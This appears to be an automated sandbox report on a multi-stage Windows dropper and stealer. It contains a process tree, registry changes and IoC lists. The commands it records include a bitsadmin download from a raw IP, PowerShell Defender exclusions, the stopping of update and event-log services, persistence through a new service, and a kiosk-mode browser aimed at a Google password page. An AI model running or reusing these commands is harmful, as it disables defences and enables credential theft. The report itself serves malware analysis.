Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings firefox.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5072 ping.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1136 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe 1136 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe 1900 skotes.exe 1900 skotes.exe 4516 stories.tmp 4516 stories.tmp 4740 b107b900a0.exe 4740 b107b900a0.exe 2660 axplong.exe 2660 axplong.exe 3572 stealc_default2.exe 3572 stealc_default2.exe 4024 axplong.exe 4024 axplong.exe 684 skotes.exe 684 skotes.exe 4352 e6a62fc7c5.exe 4352 e6a62fc7c5.exe 1924 531cd8388c.exe 1924 531cd8388c.exe 2020 b489200d48.exe 2020 b489200d48.exe 3572 stealc_default2.exe 3572 stealc_default2.exe 1860 46c1facbb6.exe 1860 46c1facbb6.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 5208 a059e40180.exe 5208 a059e40180.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 5208 a059e40180.exe 5208 a059e40180.exe 5208 a059e40180.exe 5736 nSoft.exe 5736 nSoft.exe 5868 6c3a0fbc6f.exe 5868 6c3a0fbc6f.exe 5736 nSoft.exe 5736 nSoft.exe 5736 nSoft.exe 5736 nSoft.exe 5988 svchost.exe 5988 svchost.exe 5988 svchost.exe 5988 svchost.exe 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6104 newwork.tmp 6552 aa3d6bbb08.exe 6552 aa3d6bbb08.exe 6848 7b7ddf7558.exe 6848 7b7ddf7558.exe 2316 Office2024.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 4508 taskkill.exe Token: SeDebugPrivilege 3552 taskkill.exe Token: SeDebugPrivilege 2296 taskkill.exe Token: SeDebugPrivilege 364 taskkill.exe Token: SeDebugPrivilege 3752 taskkill.exe Token: SeDebugPrivilege 1308 firefox.exe Token: SeDebugPrivilege 1308 firefox.exe Token: SeDebugPrivilege 5208 a059e40180.exe Token: SeDebugPrivilege 6024 powershell.exe Token: SeShutdownPrivilege 6708 powercfg.exe Token: SeCreatePagefilePrivilege 6708 powercfg.exe Token: SeShutdownPrivilege 6736 powercfg.exe Token: SeCreatePagefilePrivilege 6736 powercfg.exe Token: SeShutdownPrivilege 6716 powercfg.exe Token: SeCreatePagefilePrivilege 6716 powercfg.exe Token: SeShutdownPrivilege 6724 powercfg.exe Token: SeCreatePagefilePrivilege 6724 powercfg.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeShutdownPrivilege 2168 powercfg.exe Token: SeCreatePagefilePrivilege 2168 powercfg.exe Token: SeLockMemoryPrivilege 3376 cmd.exe Token: SeShutdownPrivilege 7008 powercfg.exe Token: SeCreatePagefilePrivilege 7008 powercfg.exe Token: SeShutdownPrivilege 7020 powercfg.exe Token: SeCreatePagefilePrivilege 7020 powercfg.exe Token: SeShutdownPrivilege 7016 powercfg.exe Token: SeCreatePagefilePrivilege 7016 powercfg.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 1136 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe 4516 stories.tmp 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 6104 newwork.tmp -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 1308 firefox.exe 2280 2d898dd098.exe 2280 2d898dd098.exe 2280 2d898dd098.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1308 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1136 wrote to memory of 1900 1136 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe 83 PID 1136 wrote to memory of 1900 1136 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe 83 PID 1136 wrote to memory of 1900 1136 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe 83 PID 1900 wrote to memory of 4552 1900 skotes.exe 85 PID 1900 wrote to memory of 4552 1900 skotes.exe 85 PID 1900 wrote to memory of 4552 1900 skotes.exe 85 PID 4552 wrote to memory of 4516 4552 stories.exe 86 PID 4552 wrote to memory of 4516 4552 stories.exe 86 PID 4552 wrote to memory of 4516 4552 stories.exe 86 PID 4516 wrote to memory of 4660 4516 stories.tmp 87 PID 4516 wrote to memory of 4660 4516 stories.tmp 87 PID 4516 wrote to memory of 4660 4516 stories.tmp 87 PID 4516 wrote to memory of 2964 4516 stories.tmp 89 PID 4516 wrote to memory of 2964 4516 stories.tmp 89 PID 4516 wrote to memory of 2964 4516 stories.tmp 89 PID 4660 wrote to memory of 4360 4660 net.exe 90 PID 4660 wrote to memory of 4360 4660 net.exe 90 PID 4660 wrote to memory of 4360 4660 net.exe 90 PID 1900 wrote to memory of 2184 1900 skotes.exe 98 PID 1900 wrote to memory of 2184 1900 skotes.exe 98 PID 1900 wrote to memory of 2184 1900 skotes.exe 98 PID 1900 wrote to memory of 4740 1900 skotes.exe 106 PID 1900 wrote to memory of 4740 1900 skotes.exe 106 PID 1900 wrote to memory of 4740 1900 skotes.exe 106 PID 4740 wrote to memory of 2660 4740 b107b900a0.exe 110 PID 4740 wrote to memory of 2660 4740 b107b900a0.exe 110 PID 4740 wrote to memory of 2660 4740 b107b900a0.exe 110 PID 1900 wrote to memory of 1488 1900 skotes.exe 111 PID 1900 wrote to memory of 1488 1900 skotes.exe 111 PID 1900 wrote to memory of 1488 1900 skotes.exe 111 PID 1488 wrote to memory of 5072 1488 0DMNix3.exe 112 PID 1488 wrote to memory of 5072 1488 0DMNix3.exe 112 PID 1488 wrote to memory of 5072 1488 0DMNix3.exe 112 PID 1488 wrote to memory of 2968 1488 0DMNix3.exe 114 PID 1488 wrote to memory of 2968 1488 0DMNix3.exe 114 PID 1488 wrote to memory of 2968 1488 0DMNix3.exe 114 PID 2660 wrote to memory of 3572 2660 axplong.exe 118 PID 2660 wrote to memory of 3572 2660 axplong.exe 118 PID 2660 wrote to memory of 3572 2660 axplong.exe 118 PID 2660 wrote to memory of 2908 2660 axplong.exe 119 PID 2660 wrote to memory of 2908 2660 axplong.exe 119 PID 2660 wrote to memory of 2908 2660 axplong.exe 119 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 2908 wrote to memory of 3492 2908 alex2022.exe 121 PID 1900 wrote to memory of 4352 1900 skotes.exe 123 PID 1900 wrote to memory of 4352 1900 skotes.exe 123 PID 1900 wrote to memory of 4352 1900 skotes.exe 123 PID 2660 wrote to memory of 1924 2660 axplong.exe 127 PID 2660 wrote to memory of 1924 2660 axplong.exe 127 PID 2660 wrote to memory of 1924 2660 axplong.exe 127 PID 2660 wrote to memory of 4672 2660 axplong.exe 129 PID 2660 wrote to memory of 4672 2660 axplong.exe 129 PID 2660 wrote to memory of 4672 2660 axplong.exe 129 PID 1900 wrote to memory of 2020 1900 skotes.exe 130 PID 1900 wrote to memory of 2020 1900 skotes.exe 130 PID 1900 wrote to memory of 2020 1900 skotes.exe 130 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2540
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe"C:\Users\Admin\AppData\Local\Temp\4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Users\Admin\AppData\Local\Temp\is-FD8BV.tmp\stories.tmp"C:\Users\Admin\AppData\Local\Temp\is-FD8BV.tmp\stories.tmp" /SL5="$602BE,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause video_jet_12355⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause video_jet_12356⤵
- System Location Discovery: System Language Discovery
PID:4360
-
-
-
C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe"C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2964
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\ReUploaded_MrAnon.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 3484⤵
- Program crash
PID:1700
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011459001\b107b900a0.exe"C:\Users\Admin\AppData\Local\Temp\1011459001\b107b900a0.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3572
-
-
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 12807⤵
- Program crash
PID:3024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1002824001\531cd8388c.exe"C:\Users\Admin\AppData\Local\Temp\1002824001\531cd8388c.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1924 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 14966⤵
- Program crash
PID:876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 14766⤵
- Program crash
PID:364
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4672 -
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1944 -
C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2316 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart8⤵PID:6280
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart9⤵PID:6336
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc8⤵
- Launches sc.exe
PID:6284
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc8⤵
- Launches sc.exe
PID:6324
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv8⤵
- Launches sc.exe
PID:5760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits8⤵
- Launches sc.exe
PID:6816
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc8⤵
- Launches sc.exe
PID:6660
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 08⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6708
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 08⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6716
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 08⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6724
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 08⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6736
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "QKJNEQWA"8⤵
- Launches sc.exe
PID:6764
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"8⤵
- Launches sc.exe
PID:7100
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog8⤵
- Launches sc.exe
PID:2564
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "QKJNEQWA"8⤵
- Launches sc.exe
PID:1804
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1052
-
-
C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3776 -
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:428 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5736
-
-
C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\is-LDTKF.tmp\newwork.tmp"C:\Users\Admin\AppData\Local\Temp\is-LDTKF.tmp\newwork.tmp" /SL5="$1602B6,3278395,54272,C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6104
-
-
-
C:\Users\Admin\AppData\Local\Temp\1005208001\aa3d6bbb08.exe"C:\Users\Admin\AppData\Local\Temp\1005208001\aa3d6bbb08.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6552
-
-
C:\Users\Admin\AppData\Local\Temp\1005209001\7b7ddf7558.exe"C:\Users\Admin\AppData\Local\Temp\1005209001\7b7ddf7558.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6848 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 15166⤵
- Program crash
PID:5716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 15366⤵
- Program crash
PID:5728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 15846⤵
- Program crash
PID:5772
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.84⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5072
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2968
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolwx.rar" "C:\Users\Admin\AppData\Local\Temp\jstsolwx.rar"4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:5404
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011747001\e6a62fc7c5.exe"C:\Users\Admin\AppData\Local\Temp\1011747001\e6a62fc7c5.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\1011748001\b489200d48.exe"C:\Users\Admin\AppData\Local\Temp\1011748001\b489200d48.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2020 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 15364⤵
- Program crash
PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011749001\46c1facbb6.exe"C:\Users\Admin\AppData\Local\Temp\1011749001\46c1facbb6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1860
-
-
C:\Users\Admin\AppData\Local\Temp\1011750001\2d898dd098.exe"C:\Users\Admin\AppData\Local\Temp\1011750001\2d898dd098.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2280 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:996
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1308 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3b8ae0d-7e81-43a0-ae6a-78006e7a4579} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" gpu6⤵PID:1528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2177f85a-32fc-433e-afdb-c963e8ea5bf8} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" socket6⤵PID:364
-
-
